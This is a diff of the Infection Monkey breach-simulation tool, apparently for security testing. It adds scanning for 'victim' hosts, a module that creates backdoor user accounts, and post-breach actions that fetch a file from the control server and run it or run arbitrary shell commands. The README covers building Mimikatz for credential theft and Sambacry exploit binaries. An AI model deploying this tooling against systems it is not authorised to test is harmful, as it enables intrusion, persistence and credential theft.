def get_victim_machines(self, scan_type, max_find=5, stop_callback=None):
|
def get_victim_machines(self, max_find=5, stop_callback=None):
|
||||||
"""
|
"""
|
||||||
Finds machines according to the ranges specified in the object
|
Finds machines according to the ranges specified in the object
|
||||||
:param scan_type: A hostscanner class, will be instanced and used to scan for new machines
|
:param scan_type: A hostscanner class, will be instanced and used to scan for new machines
|
||||||
|
@ -70,16 +71,18 @@ class NetworkScanner(object):
|
||||||
:param stop_callback: A callback to check at any point if we should stop scanning
|
:param stop_callback: A callback to check at any point if we should stop scanning
|
||||||
:return: yields a sequence of VictimHost instances
|
:return: yields a sequence of VictimHost instances
|
||||||
"""
|
"""
|
||||||
if not scan_type:
|
|
||||||
return
|
|
||||||
|
|
||||||
scanner = scan_type()
|
TCPscan = TcpScanner()
|
||||||
|
Pinger = PingScanner()
|
||||||
victims_count = 0
|
victims_count = 0
|
||||||
|
|
||||||
for net_range in self._ranges:
|
for net_range in self._ranges:
|
||||||
LOG.debug("Scanning for potential victims in the network %r", net_range)
|
LOG.debug("Scanning for potential victims in the network %r", net_range)
|
||||||
for ip_addr in net_range:
|
for ip_addr in net_range:
|
||||||
victim = VictimHost(ip_addr)
|
if hasattr(net_range, 'domain_name'):
|
||||||
|
victim = VictimHost(ip_addr, net_range.domain_name)
|
||||||
|
else:
|
||||||
|
victim = VictimHost(ip_addr)
|
||||||
if stop_callback and stop_callback():
|
if stop_callback and stop_callback():
|
||||||
LOG.debug("Got stop signal")
|
LOG.debug("Got stop signal")
|
||||||
break
|
break
|
||||||
|
@ -94,9 +97,11 @@ class NetworkScanner(object):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
LOG.debug("Scanning %r...", victim)
|
LOG.debug("Scanning %r...", victim)
|
||||||
|
pingAlive = Pinger.is_host_alive(victim)
|
||||||
|
tcpAlive = TCPscan.is_host_alive(victim)
|
||||||
|
|
||||||
# if scanner detect machine is up, add it to victims list
|
# if scanner detect machine is up, add it to victims list
|
||||||
if scanner.is_host_alive(victim):
|
if pingAlive or tcpAlive:
|
||||||
LOG.debug("Found potential victim: %r", victim)
|
LOG.debug("Found potential victim: %r", victim)
|
||||||
victims_count += 1
|
victims_count += 1
|
||||||
yield victim
|
yield victim
|
||||||
|
@ -106,8 +111,9 @@ class NetworkScanner(object):
|
||||||
|
|
||||||
break
|
break
|
||||||
|
|
||||||
if SCAN_DELAY:
|
if WormConfiguration.tcp_scan_interval:
|
||||||
time.sleep(SCAN_DELAY)
|
# time.sleep uses seconds, while config is in milliseconds
|
||||||
|
time.sleep(WormConfiguration.tcp_scan_interval/float(1000))
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _is_any_ip_in_subnet(ip_addresses, subnet_str):
|
def _is_any_ip_in_subnet(ip_addresses, subnet_str):
|
||||||
|
|
|
@ -59,9 +59,9 @@ class PingScanner(HostScanner, HostFinger):
|
||||||
if regex_result:
|
if regex_result:
|
||||||
try:
|
try:
|
||||||
ttl = int(regex_result.group(0))
|
ttl = int(regex_result.group(0))
|
||||||
if LINUX_TTL == ttl:
|
if ttl <= LINUX_TTL:
|
||||||
host.os['type'] = 'linux'
|
host.os['type'] = 'linux'
|
||||||
elif WINDOWS_TTL == ttl:
|
else: # as far we we know, could also be OSX/BSD but lets handle that when it comes up.
|
||||||
host.os['type'] = 'windows'
|
host.os['type'] = 'windows'
|
||||||
return True
|
return True
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
|
|
|
@ -9,9 +9,13 @@ import re
|
||||||
|
|
||||||
from six.moves import range
|
from six.moves import range
|
||||||
|
|
||||||
|
from infection_monkey.pyinstaller_utils import get_binary_file_path
|
||||||
|
from infection_monkey.utils import is_64bit_python
|
||||||
|
|
||||||
DEFAULT_TIMEOUT = 10
|
DEFAULT_TIMEOUT = 10
|
||||||
BANNER_READ = 1024
|
BANNER_READ = 1024
|
||||||
IP_ADDR_RE = r'[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
|
IP_ADDR_RE = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
|
||||||
|
IP_ADDR_PARENTHESES_RE = r'\(' + IP_ADDR_RE + r'\)'
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
SLEEP_BETWEEN_POLL = 0.5
|
SLEEP_BETWEEN_POLL = 0.5
|
||||||
|
@ -175,9 +179,10 @@ def tcp_port_to_service(port):
|
||||||
return 'tcp-' + str(port)
|
return 'tcp-' + str(port)
|
||||||
|
|
||||||
|
|
||||||
def traceroute(target_ip, ttl):
|
def traceroute(target_ip, ttl=64):
|
||||||
"""
|
"""
|
||||||
Traceroute for a specific IP/name.
|
Traceroute for a specific IP/name.
|
||||||
|
Note, may throw exception on failure that should be handled by caller.
|
||||||
:param target_ip: IP/name of target
|
:param target_ip: IP/name of target
|
||||||
:param ttl: Max TTL
|
:param ttl: Max TTL
|
||||||
:return: Sequence of IPs in the way
|
:return: Sequence of IPs in the way
|
||||||
|
@ -188,6 +193,53 @@ def traceroute(target_ip, ttl):
|
||||||
return _traceroute_linux(target_ip, ttl)
|
return _traceroute_linux(target_ip, ttl)
|
||||||
|
|
||||||
|
|
||||||
|
def _get_traceroute_bin_path():
|
||||||
|
"""
|
||||||
|
Gets the path to the prebuilt traceroute executable
|
||||||
|
|
||||||
|
This is the traceroute utility from: http://traceroute.sourceforge.net
|
||||||
|
Its been built using the buildroot utility with the following settings:
|
||||||
|
* Statically link to musl and all other required libs
|
||||||
|
* Optimize for size
|
||||||
|
This is done because not all linux distros come with traceroute out-of-the-box, and to ensure it behaves as expected
|
||||||
|
|
||||||
|
:return: Path to traceroute executable
|
||||||
|
"""
|
||||||
|
return get_binary_file_path("traceroute64" if is_64bit_python() else "traceroute32")
|
||||||
|
|
||||||
|
|
||||||
|
def _parse_traceroute(output, regex, ttl):
|
||||||
|
"""
|
||||||
|
Parses the output of traceroute (from either Linux or Windows)
|
||||||
|
:param output: The output of the traceroute
|
||||||
|
:param regex: Regex for finding an IP address
|
||||||
|
:param ttl: Max TTL. Must be the same as the TTL used as param for traceroute.
|
||||||
|
:return: List of ips which are the hops on the way to the traceroute destination.
|
||||||
|
If a hop's IP wasn't found by traceroute, instead of an IP, the array will contain None
|
||||||
|
"""
|
||||||
|
ip_lines = output.split('\n')
|
||||||
|
trace_list = []
|
||||||
|
|
||||||
|
first_line_index = None
|
||||||
|
for i in range(len(ip_lines)):
|
||||||
|
if re.search(r'^\s*1', ip_lines[i]) is not None:
|
||||||
|
first_line_index = i
|
||||||
|
break
|
||||||
|
|
||||||
|
for i in range(first_line_index, first_line_index + ttl):
|
||||||
|
if re.search(r'^\s*' + str(i - first_line_index + 1), ip_lines[i]) is None: # If trace is finished
|
||||||
|
break
|
||||||
|
|
||||||
|
re_res = re.search(regex, ip_lines[i])
|
||||||
|
if re_res is None:
|
||||||
|
ip_addr = None
|
||||||
|
else:
|
||||||
|
ip_addr = re_res.group()
|
||||||
|
trace_list.append(ip_addr)
|
||||||
|
|
||||||
|
return trace_list
|
||||||
|
|
||||||
|
|
||||||
def _traceroute_windows(target_ip, ttl):
|
def _traceroute_windows(target_ip, ttl):
|
||||||
"""
|
"""
|
||||||
Traceroute for a specific IP/name - Windows implementation
|
Traceroute for a specific IP/name - Windows implementation
|
||||||
|
@ -200,59 +252,22 @@ def _traceroute_windows(target_ip, ttl):
|
||||||
target_ip]
|
target_ip]
|
||||||
proc_obj = subprocess.Popen(cli, stdout=subprocess.PIPE)
|
proc_obj = subprocess.Popen(cli, stdout=subprocess.PIPE)
|
||||||
stdout, stderr = proc_obj.communicate()
|
stdout, stderr = proc_obj.communicate()
|
||||||
ip_lines = stdout.split('\r\n')
|
stdout = stdout.replace('\r', '')
|
||||||
trace_list = []
|
return _parse_traceroute(stdout, IP_ADDR_RE, ttl)
|
||||||
|
|
||||||
first_line_index = None
|
|
||||||
for i in range(len(ip_lines)):
|
|
||||||
if re.search(r'^\s*1', ip_lines[i]) is not None:
|
|
||||||
first_line_index = i
|
|
||||||
break
|
|
||||||
|
|
||||||
for i in range(first_line_index, first_line_index + ttl):
|
|
||||||
if re.search(r'^\s*' + str(i - first_line_index + 1), ip_lines[i]) is None: # If trace is finished
|
|
||||||
break
|
|
||||||
|
|
||||||
re_res = re.search(IP_ADDR_RE, ip_lines[i])
|
|
||||||
if re_res is None:
|
|
||||||
ip_addr = None
|
|
||||||
else:
|
|
||||||
ip_addr = re_res.group()
|
|
||||||
trace_list.append(ip_addr)
|
|
||||||
|
|
||||||
return trace_list
|
|
||||||
|
|
||||||
|
|
||||||
def _traceroute_linux(target_ip, ttl):
|
def _traceroute_linux(target_ip, ttl):
|
||||||
"""
|
"""
|
||||||
Traceroute for a specific IP/name - Linux implementation
|
Traceroute for a specific IP/name - Linux implementation
|
||||||
"""
|
"""
|
||||||
# implementation note: We're currently going to just use ping.
|
|
||||||
# reason is, implementing a non root requiring user is complicated (see traceroute(8) code)
|
|
||||||
# while this is just ugly
|
|
||||||
# we can't use traceroute because it's not always installed
|
|
||||||
current_ttl = 1
|
|
||||||
trace_list = []
|
|
||||||
while current_ttl <= ttl:
|
|
||||||
cli = ["ping",
|
|
||||||
"-c", "1",
|
|
||||||
"-w", "1",
|
|
||||||
"-t", str(current_ttl),
|
|
||||||
target_ip]
|
|
||||||
proc_obj = subprocess.Popen(cli, stdout=subprocess.PIPE)
|
|
||||||
stdout, stderr = proc_obj.communicate()
|
|
||||||
ips = re.findall(IP_ADDR_RE, stdout)
|
|
||||||
if len(ips) < 2: # Unexpected output. Fail the whole thing since it's not reliable.
|
|
||||||
return []
|
|
||||||
elif ips[-1] in trace_list: # Failed getting this hop
|
|
||||||
trace_list.append(None)
|
|
||||||
else:
|
|
||||||
trace_list.append(ips[-1])
|
|
||||||
dest_ip = ips[0] # first ip is dest ip. must be parsed here since it can change between pings
|
|
||||||
|
|
||||||
if dest_ip == ips[-1]:
|
cli = [_get_traceroute_bin_path(),
|
||||||
break
|
"-m", str(ttl),
|
||||||
|
target_ip]
|
||||||
|
proc_obj = subprocess.Popen(cli, stdout=subprocess.PIPE)
|
||||||
|
stdout, stderr = proc_obj.communicate()
|
||||||
|
|
||||||
current_ttl += 1
|
lines = _parse_traceroute(stdout, IP_ADDR_PARENTHESES_RE, ttl)
|
||||||
|
lines = [x[1:-1] if x else None # Removes parenthesis
|
||||||
return trace_list
|
for x in lines]
|
||||||
|
return lines
|
||||||
|
|
|
@ -0,0 +1,4 @@
|
||||||
|
__author__ = 'danielg'
|
||||||
|
|
||||||
|
|
||||||
|
from add_user import BackdoorUser
|
|
@ -0,0 +1,52 @@
|
||||||
|
import datetime
|
||||||
|
import logging
|
||||||
|
import subprocess
|
||||||
|
import sys
|
||||||
|
from infection_monkey.config import WormConfiguration
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
# Linux doesn't have WindowsError
|
||||||
|
try:
|
||||||
|
WindowsError
|
||||||
|
except NameError:
|
||||||
|
WindowsError = None
|
||||||
|
|
||||||
|
__author__ = 'danielg'
|
||||||
|
|
||||||
|
|
||||||
|
class BackdoorUser(object):
|
||||||
|
"""
|
||||||
|
This module adds a disabled user to the system.
|
||||||
|
This tests part of the ATT&CK matrix
|
||||||
|
"""
|
||||||
|
|
||||||
|
def act(self):
|
||||||
|
LOG.info("Adding a user")
|
||||||
|
try:
|
||||||
|
if sys.platform.startswith("win"):
|
||||||
|
retval = self.add_user_windows()
|
||||||
|
else:
|
||||||
|
retval = self.add_user_linux()
|
||||||
|
if retval != 0:
|
||||||
|
LOG.warn("Failed to add a user")
|
||||||
|
else:
|
||||||
|
LOG.info("Done adding user")
|
||||||
|
except OSError:
|
||||||
|
LOG.exception("Exception while adding a user")
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def add_user_linux():
|
||||||
|
cmd_line = ['useradd', '-M', '--expiredate',
|
||||||
|
datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
|
||||||
|
WormConfiguration.user_to_add]
|
||||||
|
retval = subprocess.call(cmd_line)
|
||||||
|
return retval
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def add_user_windows():
|
||||||
|
cmd_line = ['net', 'user', WormConfiguration.user_to_add,
|
||||||
|
WormConfiguration.remote_user_pass,
|
||||||
|
'/add', '/ACTIVE:NO']
|
||||||
|
retval = subprocess.call(cmd_line)
|
||||||
|
return retval
|
|
@ -0,0 +1,68 @@
|
||||||
|
from infection_monkey.post_breach.pba import PBA
|
||||||
|
from infection_monkey.control import ControlClient
|
||||||
|
from infection_monkey.config import WormConfiguration
|
||||||
|
from infection_monkey.utils import get_monkey_dir_path
|
||||||
|
import requests
|
||||||
|
import os
|
||||||
|
import logging
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
__author__ = 'VakarisZ'
|
||||||
|
|
||||||
|
# Default commands for executing PBA file and then removing it
|
||||||
|
DEFAULT_LINUX_COMMAND = "chmod +x {0} ; {0} ; rm {0}"
|
||||||
|
DEFAULT_WINDOWS_COMMAND = "{0} & del {0}"
|
||||||
|
|
||||||
|
|
||||||
|
class FileExecution(PBA):
|
||||||
|
"""
|
||||||
|
Defines user's file execution post breach action.
|
||||||
|
"""
|
||||||
|
def __init__(self, linux_command="", windows_command=""):
|
||||||
|
self.linux_filename = WormConfiguration.PBA_linux_filename
|
||||||
|
self.windows_filename = WormConfiguration.PBA_windows_filename
|
||||||
|
super(FileExecution, self).__init__("File execution", linux_command, windows_command)
|
||||||
|
|
||||||
|
def _execute_linux(self):
|
||||||
|
FileExecution.download_PBA_file(get_monkey_dir_path(), self.linux_filename)
|
||||||
|
return super(FileExecution, self)._execute_linux()
|
||||||
|
|
||||||
|
def _execute_win(self):
|
||||||
|
FileExecution.download_PBA_file(get_monkey_dir_path(), self.windows_filename)
|
||||||
|
return super(FileExecution, self)._execute_win()
|
||||||
|
|
||||||
|
def add_default_command(self, is_linux):
|
||||||
|
"""
|
||||||
|
Replaces current (likely empty) command with default file execution command (that changes permissions, executes
|
||||||
|
and finally deletes post breach file).
|
||||||
|
Default commands are defined as globals in this module.
|
||||||
|
:param is_linux: Boolean that indicates for which OS the command is being set.
|
||||||
|
"""
|
||||||
|
if is_linux:
|
||||||
|
file_path = os.path.join(get_monkey_dir_path(), self.linux_filename)
|
||||||
|
self.linux_command = DEFAULT_LINUX_COMMAND.format(file_path)
|
||||||
|
else:
|
||||||
|
file_path = os.path.join(get_monkey_dir_path(), self.windows_filename)
|
||||||
|
self.windows_command = DEFAULT_WINDOWS_COMMAND.format(file_path)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def download_PBA_file(dst_dir, filename):
|
||||||
|
"""
|
||||||
|
Handles post breach action file download
|
||||||
|
:param dst_dir: Destination directory
|
||||||
|
:param filename: Filename
|
||||||
|
:return: True if successful, false otherwise
|
||||||
|
"""
|
||||||
|
|
||||||
|
PBA_file_contents = requests.get("https://%s/api/pba/download/%s" %
|
||||||
|
(WormConfiguration.current_server, filename),
|
||||||
|
verify=False,
|
||||||
|
proxies=ControlClient.proxies)
|
||||||
|
try:
|
||||||
|
with open(os.path.join(dst_dir, filename), 'wb') as written_PBA_file:
|
||||||
|
written_PBA_file.write(PBA_file_contents.content)
|
||||||
|
return True
|
||||||
|
except IOError as e:
|
||||||
|
LOG.error("Can not download post breach file to target machine, because %s" % e)
|
||||||
|
return False
|
|
@ -0,0 +1,68 @@
|
||||||
|
import logging
|
||||||
|
from infection_monkey.control import ControlClient
|
||||||
|
import subprocess
|
||||||
|
import socket
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
__author__ = 'VakarisZ'
|
||||||
|
|
||||||
|
|
||||||
|
class PBA(object):
|
||||||
|
"""
|
||||||
|
Post breach action object. Can be extended to support more than command execution on target machine.
|
||||||
|
"""
|
||||||
|
def __init__(self, name="unknown", linux_command="", windows_command=""):
|
||||||
|
"""
|
||||||
|
:param name: Name of post breach action.
|
||||||
|
:param linux_command: Command that will be executed on linux machine
|
||||||
|
:param windows_command: Command that will be executed on windows machine
|
||||||
|
"""
|
||||||
|
self.linux_command = linux_command
|
||||||
|
self.windows_command = windows_command
|
||||||
|
self.name = name
|
||||||
|
|
||||||
|
def run(self, is_linux):
|
||||||
|
"""
|
||||||
|
Runs post breach action command
|
||||||
|
:param is_linux: boolean that indicates on which os monkey is running
|
||||||
|
"""
|
||||||
|
if is_linux:
|
||||||
|
command = self.linux_command
|
||||||
|
exec_funct = self._execute_linux
|
||||||
|
else:
|
||||||
|
command = self.windows_command
|
||||||
|
exec_funct = self._execute_win
|
||||||
|
if command:
|
||||||
|
hostname = socket.gethostname()
|
||||||
|
ControlClient.send_telemetry('post_breach', {'command': command,
|
||||||
|
'result': exec_funct(),
|
||||||
|
'name': self.name,
|
||||||
|
'hostname': hostname,
|
||||||
|
'ip': socket.gethostbyname(hostname)
|
||||||
|
})
|
||||||
|
|
||||||
|
def _execute_linux(self):
|
||||||
|
"""
|
||||||
|
Default linux PBA execution function. Override it if additional functionality is needed
|
||||||
|
"""
|
||||||
|
return self._execute_default(self.linux_command)
|
||||||
|
|
||||||
|
def _execute_win(self):
|
||||||
|
"""
|
||||||
|
Default linux PBA execution function. Override it if additional functionality is needed
|
||||||
|
"""
|
||||||
|
return self._execute_default(self.windows_command)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _execute_default(command):
|
||||||
|
"""
|
||||||
|
Default post breach command execution routine
|
||||||
|
:param command: What command to execute
|
||||||
|
:return: Tuple of command's output string and boolean, indicating if it succeeded
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
return subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True), True
|
||||||
|
except subprocess.CalledProcessError as e:
|
||||||
|
# Return error output of the command
|
||||||
|
return e.output, False
|
|
@ -0,0 +1,83 @@
|
||||||
|
import logging
|
||||||
|
import infection_monkey.config
|
||||||
|
from file_execution import FileExecution
|
||||||
|
from pba import PBA
|
||||||
|
from infection_monkey.utils import is_windows_os
|
||||||
|
from infection_monkey.utils import get_monkey_dir_path
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
__author__ = 'VakarisZ'
|
||||||
|
|
||||||
|
DIR_CHANGE_WINDOWS = 'cd %s & '
|
||||||
|
DIR_CHANGE_LINUX = 'cd %s ; '
|
||||||
|
|
||||||
|
|
||||||
|
class PostBreach(object):
|
||||||
|
"""
|
||||||
|
This class handles post breach actions execution
|
||||||
|
"""
|
||||||
|
def __init__(self):
|
||||||
|
self.os_is_linux = not is_windows_os()
|
||||||
|
self.pba_list = self.config_to_pba_list(infection_monkey.config.WormConfiguration)
|
||||||
|
|
||||||
|
def execute(self):
|
||||||
|
"""
|
||||||
|
Executes all post breach actions.
|
||||||
|
"""
|
||||||
|
for pba in self.pba_list:
|
||||||
|
pba.run(self.os_is_linux)
|
||||||
|
LOG.info("Post breach actions executed")
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def config_to_pba_list(config):
|
||||||
|
"""
|
||||||
|
Returns a list of PBA objects generated from config.
|
||||||
|
:param config: Monkey configuration
|
||||||
|
:return: A list of PBA objects.
|
||||||
|
"""
|
||||||
|
pba_list = []
|
||||||
|
pba_list.extend(PostBreach.get_custom_PBA(config))
|
||||||
|
|
||||||
|
return pba_list
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_custom_PBA(config):
|
||||||
|
"""
|
||||||
|
Creates post breach actions depending on users input into 'custom post breach' config section
|
||||||
|
:param config: monkey's configuration
|
||||||
|
:return: List of PBA objects ([user's file execution PBA, user's command execution PBA])
|
||||||
|
"""
|
||||||
|
custom_list = []
|
||||||
|
file_pba = FileExecution()
|
||||||
|
command_pba = PBA(name="Custom")
|
||||||
|
|
||||||
|
if not is_windows_os():
|
||||||
|
# Add linux commands to PBA's
|
||||||
|
if config.PBA_linux_filename:
|
||||||
|
if config.custom_PBA_linux_cmd:
|
||||||
|
# Add change dir command, because user will try to access his file
|
||||||
|
file_pba.linux_command = (DIR_CHANGE_LINUX % get_monkey_dir_path()) + config.custom_PBA_linux_cmd
|
||||||
|
else:
|
||||||
|
file_pba.add_default_command(is_linux=True)
|
||||||
|
elif config.custom_PBA_linux_cmd:
|
||||||
|
command_pba.linux_command = config.custom_PBA_linux_cmd
|
||||||
|
else:
|
||||||
|
# Add windows commands to PBA's
|
||||||
|
if config.PBA_windows_filename:
|
||||||
|
if config.custom_PBA_windows_cmd:
|
||||||
|
# Add change dir command, because user will try to access his file
|
||||||
|
file_pba.windows_command = (DIR_CHANGE_WINDOWS % get_monkey_dir_path()) + \
|
||||||
|
config.custom_PBA_windows_cmd
|
||||||
|
else:
|
||||||
|
file_pba.add_default_command(is_linux=False)
|
||||||
|
elif config.custom_PBA_windows_cmd:
|
||||||
|
command_pba.windows_command = config.custom_PBA_windows_cmd
|
||||||
|
|
||||||
|
# Add PBA's to list
|
||||||
|
if file_pba.linux_command or file_pba.windows_command:
|
||||||
|
custom_list.append(file_pba)
|
||||||
|
if command_pba.windows_command or command_pba.linux_command:
|
||||||
|
custom_list.append(command_pba)
|
||||||
|
|
||||||
|
return custom_list
|
|
@ -1,40 +1,34 @@
|
||||||
To get development versions of Monkey Island and Monkey look into deployment scripts folder.
|
To get development versions of Monkey Island and Monkey look into deployment scripts folder.
|
||||||
If you only want to monkey from scratch you may refer to the instructions below.
|
If you only want to build monkey from scratch you may reference instructions below.
|
||||||
|
|
||||||
The monkey is composed of three separate parts.
|
The monkey is composed of three separate parts.
|
||||||
* The Infection Monkey itself - PyInstaller compressed python archives
|
* The Infection Monkey itself - PyInstaller compressed python archives
|
||||||
* Sambacry binaries - Two linux binaries, 32/64 bit.
|
* Sambacry binaries - Two linux binaries, 32/64 bit.
|
||||||
* Mimikatz binaries - Two windows binaries, 32/64 bit.
|
* Mimikatz binaries - Two windows binaries, 32/64 bit.
|
||||||
|
* Traceroute binaries - Two linux binaries, 32/64bit.
|
||||||
|
|
||||||
--- Windows ---
|
--- Windows ---
|
||||||
|
|
||||||
1. Install python 2.7. Preferably you should use ActiveState Python which includes pywin32 built in.
|
1. Install python 2.7.15
|
||||||
You must use an up to date version, at least version 2.7.10
|
Download and install from: https://www.python.org/downloads/release/python-2715/
|
||||||
https://www.python.org/download/releases/2.7/
|
2. Add python directories to PATH environment variable (if you didn't install ActiveState Python)
|
||||||
2. Install pywin32 (if you didn't install ActiveState Python)
|
|
||||||
Install pywin32, minimum build 219
|
|
||||||
http://sourceforge.net/projects/pywin32/files/pywin32
|
|
||||||
3. Add python directories to PATH environment variable (if you didn't install ActiveState Python)
|
|
||||||
a. Run the following command on a cmd console (Replace C:\Python27 with your python directory if it's different)
|
a. Run the following command on a cmd console (Replace C:\Python27 with your python directory if it's different)
|
||||||
setx /M PATH "%PATH%;C:\Python27;C:\Pytohn27\Scripts
|
setx /M PATH "%PATH%;C:\Python27;C:\Python27\Scripts
|
||||||
b. Close the console, make sure you execute all commands in a new cmd console from now on.
|
b. Close the console, make sure you execute all commands in a new cmd console from now on.
|
||||||
4. Install pip
|
3. Install further dependencies
|
||||||
a. Download and run the pip installer
|
|
||||||
https://bootstrap.pypa.io/get-pip.py
|
|
||||||
5. Install further dependencies
|
|
||||||
a. install VCForPython27.msi
|
a. install VCForPython27.msi
|
||||||
https://aka.ms/vcpython27
|
https://aka.ms/vcpython27
|
||||||
b. if not installed, install Microsoft Visual C++ 2010 SP1 Redistributable Package
|
b. if not installed, install Microsoft Visual C++ 2010 SP1 Redistributable Package
|
||||||
32bit: http://www.microsoft.com/en-us/download/details.aspx?id=8328
|
32bit: http://www.microsoft.com/en-us/download/details.aspx?id=8328
|
||||||
64bit: http://www.microsoft.com/en-us/download/details.aspx?id=13523
|
64bit: http://www.microsoft.com/en-us/download/details.aspx?id=13523
|
||||||
6. Download the dependent python packages using
|
4. Download the dependent python packages using
|
||||||
pip install -r requirements.txt
|
pip install -r requirements_windows.txt
|
||||||
7. Download and extract UPX binary to [source-path]\monkey\infection_monkey\bin\upx.exe:
|
5. Download and extract UPX binary to [source-path]\monkey\infection_monkey\bin\upx.exe:
|
||||||
https://github.com/upx/upx/releases/download/v3.94/upx394w.zip
|
https://github.com/upx/upx/releases/download/v3.94/upx394w.zip
|
||||||
8. Build/Download Sambacry and Mimikatz binaries
|
6. Build/Download Sambacry and Mimikatz binaries
|
||||||
a. Build/Download according to sections at the end of this readme.
|
a. Build/Download according to sections at the end of this readme.
|
||||||
b. Place the binaries under [code location]\infection_monkey\bin
|
b. Place the binaries under [code location]\infection_monkey\bin
|
||||||
9. To build the final exe:
|
7. To build the final exe:
|
||||||
cd [code location]/infection_monkey
|
cd [code location]/infection_monkey
|
||||||
build_windows.bat
|
build_windows.bat
|
||||||
output is placed under dist\monkey.exe
|
output is placed under dist\monkey.exe
|
||||||
|
@ -48,11 +42,14 @@ Tested on Ubuntu 16.04 and 17.04.
|
||||||
sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1
|
sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1
|
||||||
Install the python packages listed in requirements.txt using pip
|
Install the python packages listed in requirements.txt using pip
|
||||||
cd [code location]/infection_monkey
|
cd [code location]/infection_monkey
|
||||||
pip install -r requirements.txt
|
pip install -r requirements_linux.txt
|
||||||
2. Build Sambacry binaries
|
2. Build Sambacry binaries
|
||||||
a. Build/Download according to sections at the end of this readme.
|
a. Build/Download according to sections at the end of this readme.
|
||||||
b. Place the binaries under [code location]\infection_monkey\bin
|
b. Place the binaries under [code location]\infection_monkey\bin, under the names 'sc_monkey_runner32.so', 'sc_monkey_runner64.so'
|
||||||
3. To build, run in terminal:
|
3. Build Traceroute binaries
|
||||||
|
a. Build/Download according to sections at the end of this readme.
|
||||||
|
b. Place the binaries under [code location]\infection_monkey\bin, under the names 'traceroute32', 'traceroute64'
|
||||||
|
4. To build, run in terminal:
|
||||||
cd [code location]/infection_monkey
|
cd [code location]/infection_monkey
|
||||||
chmod +x build_linux.sh
|
chmod +x build_linux.sh
|
||||||
./build_linux.sh
|
./build_linux.sh
|
||||||
|
@ -61,19 +58,44 @@ Tested on Ubuntu 16.04 and 17.04.
|
||||||
-- Sambacry --
|
-- Sambacry --
|
||||||
|
|
||||||
Sambacry requires two standalone binaries to execute remotely.
|
Sambacry requires two standalone binaries to execute remotely.
|
||||||
1. Install gcc-multilib if it's not installed
|
a. Build sambacry binaries yourself
|
||||||
sudo apt-get install gcc-multilib
|
a.1. Install gcc-multilib if it's not installed
|
||||||
2. Build the binaries
|
sudo apt-get install gcc-multilib
|
||||||
cd [code location]/infection_monkey/monkey_utils/sambacry_monkey_runner
|
a.2. Build the binaries
|
||||||
./build.sh
|
cd [code location]/infection_monkey/monkey_utils/sambacry_monkey_runner
|
||||||
|
./build.sh
|
||||||
|
|
||||||
|
b. Download our pre-built sambacry binaries
|
||||||
|
b.1. Available here:
|
||||||
|
32bit: https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner32.so
|
||||||
|
64bit: https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner64.so
|
||||||
|
|
||||||
-- Mimikatz --
|
-- Mimikatz --
|
||||||
|
|
||||||
Mimikatz is required for the Monkey to be able to steal credentials on Windows. It's possible to either compile from sources (requires Visual Studio 2013 and up) or download the binaries from
|
Mimikatz is required for the Monkey to be able to steal credentials on Windows. It's possible to either compile binaries from source (requires Visual Studio 2013 and up) or download them from our repository.
|
||||||
https://github.com/guardicore/mimikatz/releases/tag/1.0.0
|
a. Build Mimikatz yourself
|
||||||
Download both 32 and 64 bit zipped DLLs and place them under [code location]\infection_monkey\bin
|
a.0. Building mimikatz requires Visual Studio 2013 and up
|
||||||
Alternatively, if you build Mimikatz, put each version in a zip file.
|
a.1. Clone our version of mimikatz from https://github.com/guardicore/mimikatz/tree/1.1.0
|
||||||
1. The zip should contain only the Mimikatz DLL named tmpzipfile123456.dll
|
a.2. Build using Visual Studio.
|
||||||
2. It should be protected using the password 'VTQpsJPXgZuXhX6x3V84G'.
|
a.3. Put each version in a zip file
|
||||||
3. The zip file should be named mk32.zip/mk64.zip accordingly.
|
a.3.1. The zip should contain only the Mimikatz DLL named tmpzipfile123456.dll
|
||||||
4. Zipping with 7zip has been tested. Other zipping software may not work.
|
a.3.2. It should be protected using the password 'VTQpsJPXgZuXhX6x3V84G'.
|
||||||
|
a.3.3. The zip file should be named mk32.zip/mk64.zip accordingly.
|
||||||
|
a.3.4. Zipping with 7zip has been tested. Other zipping software may not work.
|
||||||
|
|
||||||
|
b. Download our pre-built mimikatz binaries
|
||||||
|
b.1. Download both 32 and 64 bit zipped DLLs from https://github.com/guardicore/mimikatz/releases/tag/1.1.0
|
||||||
|
b.2. Place them under [code location]\infection_monkey\bin
|
||||||
|
|
||||||
|
-- Traceroute --
|
||||||
|
|
||||||
|
Traceroute requires two standalone binaries to execute remotely.
|
||||||
|
The monkey carries the standalone binaries since traceroute isn't built in all Linux distributions.
|
||||||
|
You can either build them yourself or download pre-built binaries.
|
||||||
|
|
||||||
|
a. Build traceroute yourself
|
||||||
|
a.1. The sources of traceroute are available here with building instructions: http://traceroute.sourceforge.net
|
||||||
|
b. Download our pre-built traceroute binaries
|
||||||
|
b.1. Available here:
|
||||||
|
32bit: https://github.com/guardicore/monkey/releases/download/1.6/traceroute32
|
||||||
|
64bit: https://github.com/guardicore/monkey/releases/download/1.6/traceroute64
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
enum34
|
enum34
|
